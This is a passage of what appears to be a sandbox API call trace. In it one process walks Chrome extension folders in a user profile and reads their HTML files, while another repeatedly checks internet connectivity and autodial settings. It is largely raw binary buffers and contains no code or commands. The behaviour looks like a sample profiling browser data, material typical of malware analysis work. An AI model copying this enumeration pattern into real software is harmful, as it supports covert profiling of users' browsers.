FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xa0\xb0\xefm\xe0\x91\xcf\x01\xf0b\xfam\xe0\x91\xcf\x01\xa0\xb0\xefm\xe0\x91\xcf\x01\xa0\xb0\xefm\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\xb0\xefm\xe0\x91\xcf\x01\xd0\xaa n\xe0\x91\xcf\x01\xd0\xaa n\xe0\x91\xcf\x01\xd0\xaa n\xe0\x91\xcf\x01\x17\x01\x00\x00\x00\x00\x00\x00\x18\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:18,771 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:18,771 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:18,852 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\zh_CN\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:18,852 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xd07\xf1m\xe0\x91\xcf\x01\xf0b\xfam\xe0\x91\xcf\x01\xd07\xf1m\xe0\x91\xcf\x01\xd07\xf1m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd07\xf1m\xe0\x91\xcf\x01\xd0\xaa n\xe0\x91\xcf\x01\xd0\xaa n\xe0\x91\xcf\x01\xd0\xaa n\xe0\x91\xcf\x01\x11\x01\x00\x00\x00\x00\x00\x00\x18\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:18,852 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:18,852 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:19,102 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\_locales\zh_TW\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:19,102 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xd07\xf1m\xe0\x91\xcf\x01\xf0b\xfam\xe0\x91\xcf\x01\x00\xbf\xf2m\xe0\x91\xcf\x01\x00\xbf\xf2m\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbf\xf2m\xe0\x91\xcf\x01\xd0\xaa n\xe0\x91\xcf\x01\xd0\xaa n\xe0\x91\xcf\x01\xd0\xaa n\xe0\x91\xcf\x01\x0b\x01\x00\x00\x00\x00\x00\x00\x10\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:19,102 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:19,102 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:19,102 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:19,102 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:19,102 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:19,182 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn\*.* |
SUCCESS | 0x0016be10 | |
| 07:44:19,182 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c8 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@\xbd$g\xe0\x91\xcf\x01\x90\xe2Gg\xe0\x91\xcf\x01\x90\xe2Gg\xe0\x91\xcf\x01\x90\xe2Gg\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00bjmhmf\x00\x00\x00\x00\x00\x00\x00\x00 \x9e`a\xe0\x91\xcf\x01`[Fg\xe0\x91\xcf\x01\x00\x81\xe1f\xe0\x91\xcf\x01\x90\xe2Gg\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x12\x000\x001\x001\x00~\x001\x00.\x005\x000\x001\x00\x00\x00\x00\x00\x00\x000\x00.\x001\x00.\x001\x00.\x005\x000\x001\x009\x00_\x000\x00 |
SUCCESS | 0x00000000 | |
| 07:44:19,182 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:19,202 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:19,202 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:19,212 | 1308 | OpenSCManagerW |
MachineName => DatabaseName => DesiredAccess => 2147483648 |
SUCCESS | 0x001727f8 | |
| 07:44:19,212 | 1308 | OpenServiceW |
ServiceControlManager => 0x001727f8 ServiceName => RASMAN DesiredAccess => 4 |
SUCCESS | 0x00172940 | |
| 07:44:19,212 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:19,212 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:19,222 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:19,302 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn\0.1.1.5019_0\*.* |
SUCCESS | 0x0016be48 | |
| 07:44:19,302 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00 \x9e`a\xe0\x91\xcf\x01`[Fg\xe0\x91\xcf\x01\x00\x81\xe1f\xe0\x91\xcf\x01\x90\xe2Gg\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 e = 0h\x00\x00\x00\x00\x00\x00\x00\xb0\xe1\xe0c\xe0\x91\xcf\x01\xd0l\xf8f\xe0\x91\xcf\x01\x80\xcd\xf7c\xe0\x91\xcf\x01\x80\xcd\xf7c\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00a\x00u\x00d\x00i\x00o\x00\x90\x00\x00\x00\x00\x00\x00\x00`T\x81d\xe0\x91\xcf\x01\xd0\x98\x80d\xe0\x91\xcf\x01\x00\xdc\x1a\xe9\x06p\xcf\x01`:\xb2d\xe0\x91\xcf\x01\xfew\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:44:19,302 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:19,382 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn\0.1.1.5019_0\audio\*.* |
SUCCESS | 0x0016be80 | |
| 07:44:19,382 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xb0\xe1\xe0c\xe0\x91\xcf\x01\xd0l\xf8f\xe0\x91\xcf\x01\x80\xcd\xf7c\xe0\x91\xcf\x01\x80\xcd\xf7c\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00ty_Sca\x00\x00\x00\x00\x00\x00\x00\x00\x80\xcd\xf7c\xe0\x91\xcf\x01\xd0\xe0\xf7c\xe0\x91\xcf\x01\x00\xdc\x1a\xe9\x06p\xcf\x01p\xcaHd\xe0\x91\xcf\x01\xd6"\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00 \x00\x00\x00,\x00\x00\x00\x00\x00\x00\x00\x18\x001\x00_\x00S\x00H\x00O\x00R\x00~\x001\x00.\x00W\x00A\x00V\x001\x00_\x00s\x00h\x00o\x00r\x00t\x00_\x00O\x00p\x00e\x00n\x00_\x001\x006\x00_\x001\x006\x00.\x00w\x00a\x00v\x00 |
SUCCESS | 0x00000000 | |
| 07:44:19,382 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:19,382 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn\0.1.1.5019_0\audio_input.html DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:19,382 | 504 | NtReadFile |
Buffer => <!doctype html>
<html>
<head>
<title>Hotword Background Page</title>
</head>
<body>
<script type="text/javascript" src="audio-input-compiled.js"></script>
</body>
</html>
FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:19,382 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:19,382 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn\0.1.1.5019_0\background.html DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:19,392 | 504 | NtReadFile |
Buffer => <!doctype html>
<html>
<head>
<script type="text/javascript" src="audio-manager-compiled.js"></script>
<title>Hotword Background Page</title>
</head>
<body>
<audio id="chime"
src="audio/1_short_Open_16_16.wav"></audio>
<div id="aic">
</d FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:19,392 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:19,392 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:19,482 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn\0.1.1.5019_0\images\*.* |
SUCCESS | 0x0016be80 | |
| 07:44:19,482 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00P\x90Le\xe0\x91\xcf\x01\xd0\xc5Ag\xe0\x91\xcf\x01`u\x15g\xe0\x91\xcf\x01`u\x15g\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00ipt> <p\x00\x00\x00\x00\x00\x00\x00`\xd2ue\xe0\x91\xcf\x01\x10Yue\xe0\x91\xcf\x01\x00 L\xea\x06p\xcf\x01`E\x8ee\xe0\x91\xcf\x01+\x04\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00e\x00r\x00r\x00o\x00r\x00.\x00p\x00n\x00g\x00x\x00\x00\x00\x00\x00\x00\x00\xf0\xda\x92e\xe0\x91\xcf\x01 \xae\x97e\xe0\x91\xcf\x01\x00 L\xea\x06p\xcf\x01\x10\x06\x9ce\xe0\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:19,482 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:19,502 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn\0.1.1.5019_0\options.html DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:19,502 | 504 | NtReadFile |
Buffer => <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Google Voice Search Hotword (Beta) Settings</title>
<link href="options.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="options-compiled.js"> FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:19,513 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:19,523 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:19,603 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn\0.1.1.5019_0\_metadata\*.* |
SUCCESS | 0x0016be80 | |
| 07:44:19,603 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00\x81\xe1f\xe0\x91\xcf\x01\xd0l\xf8f\xe0\x91\xcf\x01\x90\x16\xe6f\xe0\x91\xcf\x01\x90\x16\xe6f\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00(Beta)\x00\x00\x00\x00\x00\x00\x00\x00\x90\x16\xe6f\xe0\x91\xcf\x01\xb0\x15\xe5f\xe0\x91\xcf\x01\x00\xab\xd5\x99\x08p\xcf\x01\xc0\x9d\xe7f\xe0\x91\xcf\x01&\x10\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00 \x00\x00\x00,\x00\x00\x00\x00\x00\x00\x00\x18\x00V\x00E\x00R\x00I\x00F\x00I\x00~\x001\x00.\x00J\x00S\x00O\x00v\x00e\x00r\x00i\x00f\x00i\x00e\x00d\x00_\x00c\x00o\x00n\x00t\x00e\x00n\x00t\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:19,603 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:19,603 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:19,693 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn\0.1.1.5019_0\_platform_specific\*.* |
SUCCESS | 0x0016be80 | |
| 07:44:19,693 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x80^\xf6a\xe0\x91\xcf\x01`\xcb\xb0b\xe0\x91\xcf\x01\x80\x10\x89b\xe0\x91\xcf\x01\x80\x10\x89b\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00(Beta)\x00\x00\x00\x00\x00\x00\x00\x00\x80\x10\x89b\xe0\x91\xcf\x01\x10\xcb8c\xe0\x91\xcf\x01\x10\xcb8c\xe0\x91\xcf\x01\x10\xcb8c\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x008\x006\x00-\x003\x002\x00_\x00 |
SUCCESS | 0x00000000 | |
| 07:44:19,693 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:19,773 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn\0.1.1.5019_0\_platform_specific\x86-32_\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:19,773 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x80\x10\x89b\xe0\x91\xcf\x01\x10\xcb8c\xe0\x91\xcf\x01\x10\xcb8c\xe0\x91\xcf\x01\x10\xcb8c\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x88\x00\x00\x00\x00\x00\x00\x00\x10\xcb8c\xe0\x91\xcf\x01p\x888c\xe0\x91\xcf\x01\x00\xdc\x1a\xe9\x06p\xcf\x01\xe0)hc\xe0\x91\xcf\x01\xf4\x03\x06\x00\x00\x00\x00\x00\x00\x10\x06\x00\x00\x00\x00\x00 \x00\x00\x00&\x00\x00\x00\x00\x00\x00\x00\x18\x00H\x00O\x00T\x00W\x00O\x00R\x00~\x001\x00.\x00N\x00E\x00X\x00h\x00o\x00t\x00w\x00o\x00r\x00d\x00-\x00x\x008\x006\x00-\x003\x002\x00.\x00n\x00e\x00x\x00e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\x1b\xddb\xe0\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:19,773 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:19,773 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:19,773 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:19,773 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:19,783 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:19,863 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\*.* |
SUCCESS | 0x0016be10 | |
| 07:44:19,863 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c8 FileInformation => h\x00\x00\x00\x00\x00\x00\x000\x0f\xa8i\xe0\x91\xcf\x01@1\x19y\xe0\x91\xcf\x01@1\x19y\xe0\x91\xcf\x01@1\x19y\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00bjmhmf\x00\x00\x00\x00\x00\x00\x00\x00\xa0\xf0\xd2g\xe0\x91\xcf\x01@\xaa\x1aj\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01p1\x1cj\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x18\x004\x002\x000\x004\x00E\x001\x00~\x001\x00.\x006\x00_\x000\x004\x00.\x002\x00.\x006\x00_\x000\x00 |
SUCCESS | 0x00000000 | |
| 07:44:19,863 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:19,943 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\*.* |
SUCCESS | 0x0016be48 | |
| 07:44:19,943 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xa0\xf0\xd2g\xe0\x91\xcf\x01@\xaa\x1aj\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01p1\x1cj\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 e = 0p\x00\x00\x00\x00\x00\x00\x00\x90\x94\xdag\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xc4 \x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x001\x002\x008\x00.\x00p\x00n\x00g\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00\x90k\x18i\xe0\x91\xcf\x01p\xf2\xa1i\xe0\x91\xcf\x01p\xf2\xa1i\xe0\x91\xcf\x01p\xf2\xa1i\xe0\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:19,943 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:20,023 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:20,023 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:20,023 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:20,023 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:20,023 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:20,043 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\*.* |
SUCCESS | 0x0016be80 | |
| 07:44:20,043 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00 *\xdfg\xe0\x91\xcf\x01\xd0N\x12i\xe0\x91\xcf\x01\x102\x0ci\xe0\x91\xcf\x01\x102\x0ci\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00(Beta)h\x00\x00\x00\x00\x00\x00\x00\xb0\xbf\xe3g\xe0\x91\xcf\x01 \xe7Mi\xe0\x91\xcf\x01\xe0F\xe5g\xe0\x91\xcf\x01\xe0F\xe5g\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00a\x00r\x006\x00-\x003\x00h\x00\x00\x00\x00\x00\x00\x00@U\xe8g\xe0\x91\xcf\x01 \xe7Mi\xe0\x91\xcf\x01p\xdc\xe9g\xe0\x91\xcf\x01p\xdc\xe9g\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:44:20,043 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:20,274 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\ar\*.* |
